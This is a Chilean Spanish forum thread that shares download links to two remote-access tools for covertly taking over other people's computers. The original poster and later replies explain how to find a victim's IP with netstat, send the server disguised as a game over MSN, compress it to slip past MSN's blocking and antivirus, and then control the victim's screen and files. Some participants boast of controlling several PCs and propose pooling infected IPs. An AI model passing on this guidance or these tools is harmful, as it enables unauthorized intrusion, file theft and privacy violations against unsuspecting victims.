• ¿Quieres apoyar a nuestro foro haciendo una donación?, entra aquí.

Tomar control de PC ajeno sin tanto webeo y administrar sus archivos

PANCHO2404

Hincha Huevas
Registrado
2005/06/21
Mensajes
0
aki les dejo 2 programas, los puse aka pa q no c chacreen...


1º Remote Desktop: con este haces la webada q keras, trabaja (como todo buen programa) con ingenieria social, le sakas la IP (en este momento toy complicao pq yo la veia con netstat -a pero ahora la wea me pega un pantallazo d 1/2 segundo y c cierra) y le mandas el juego "autobus"... al ser cerrado (tras su ejecucion) se instalan los componentes q van a permitir tu ingreso, luego pones la IP del wn en el programa y le haces click en conectar... listo, estas dentro, la interfase es identica a estar sentado frente al pc del wn

programa aki: http://ontargetpage.webcindario.com/ontargetpage/espionaje/RemoteDesktop.zip


2º Remote Explorer: con este administras archivos con mayor facilidad, la interfase es similar al "explorar" una carpeta con el explorador d windows, aki puedes cambiar nombres, borrar, crear y hacer simplemente lo q kieras dentro del pc, la diferencia que se explica en la pagina de donde lo sake (con el remote desktop) es q con el puedes utilizar el pc victima como una ftp, agarras archivos y los tiras a tu pc, sin problemas.

programa aki:
http://ontargetpage.webcindario.com/ontargetpage/espionaje/RemoteExplorer.zip

eso seria espero les sirvan

bye


PD: 8 de agosto d 2006, links editados y funcionando
bye

-Boro-
 
Gracias.
Cuando me conecto a la IP del weon, mi pantalla queda como la de el y por ende puedo hacer la wea que quiera?

Quien me explica el sistema?
Saludos ;)
 
austin del ass dame tu msn y t explico todo, la wea es genial, ya tengo como 8 pcs controla2... :P
 
borominion weon
ESTE ES FORO DE CUENTAS
no de hacking, lamming en este caso

moved
 
khal weon
la idea es q no c chacree con 392472398 wnes weiando, aunke si keren, pasen las IPs con los servidores instala2 pa q leechemos to2 d ellos
:P

bye
 
mmm necesito probarlo

teni algun programa pa sacarle la ip por que si es cxon conexion adsl son dinamicas y tenemos que cambiarlas a cada rato

esop chable
 
borominion dijo:
khal weon
la idea es q no c chacree con 392472398 wnes weiando, aunke si keren, pasen las IPs con los servidores instala2 pa q leechemos to2 d ellos
:P

bye

ni tu ni yo decide que un aporte se postea en otra parte pa que no se chacree. asi que 8=============D y queate tranquilo con tu mamadera de carne
 
el primero necesita la ejecucion de un programa por parte de la victima segun entendi...

el segundo... basta con tener la ip?... el firewall te para el truquito en ambos casos?...

agradezco cualquier explicacion...
 
alo alguen me respnda
me sale correction is forcefully rejected
 
ia compadre borominion
he esperado toda mi vida este momento ahhhxD
no mira yo ace tiempo instale este programita en unos pc's
el problma es que luego de haber instalado el programa en el otro pc
e instalado el programa pa ver en el mio
ingreso la ip del otro pc y me tira un error!
dice:
run-time error '-2147...

ke ago???
ayuda plix ;)
si funka ahi komparto las ip ;)
 
pta..no puedo enviar el archivo por la kga de msn... :nonono:

otra forma?; las ip las saco con el ip private lo caxan?
 
ya aer...:


Santoro: si algunos antivirus lo detectan, no todos.

cabeza de huevo: ambos necesitan q envies el servidor por msn, en el caso del remote desktop es "autobus" en el d remote explorer es "futbolmania"

Master_Danatas: Eso puede ser o bien pq t para el firewall, o el antivirus detecto el programa... o bien por alguna razon (q yo tampoco tengo clara) q en algunos pcs simplemente no funka...


Kodama: No sea ignorante, para enviar archivos como estos por msn, comprimalos... asi d simple, MSN blokea los exe...
Mandame el IP private pa cacharlo, yo las saco metiendome en cmd, mientras les mando el programa pongo "netstat -n" y me muestra con q IPs tengo tasa d transferencia en ese momento...


eso...

dudas, agregue a msn: [email protected]
 
_metro_ dijo:
ia compadre borominion
he esperado toda mi vida este momento ahhhxD
no mira yo ace tiempo instale este programita en unos pc's
el problma es que luego de haber instalado el programa en el otro pc
e instalado el programa pa ver en el mio
ingreso la ip del otro pc y me tira un error!
dice:
run-time error '-2147...

ke ago???
ayuda plix ;)
si funka ahi komparto las ip ;)


mish... no soi el unico :D
 
borominion: oye probe los programas y funcionan la raja pero como puede eliminar el server despues si no quiero entrar mas a ese computador y no quiero que nadie mas entre, es que lo hice en un PC de un amigo pa probar pero ahora el loko es vulnerable,, jejej porfa como se lo borro.
 
malinke: q ejecute varios antispyware.... y uno q otro antivirus, probablemente panda online lo remueva, d todas formas el server c instala en los archivos temporales d internet segun se
 
Volver
Arriba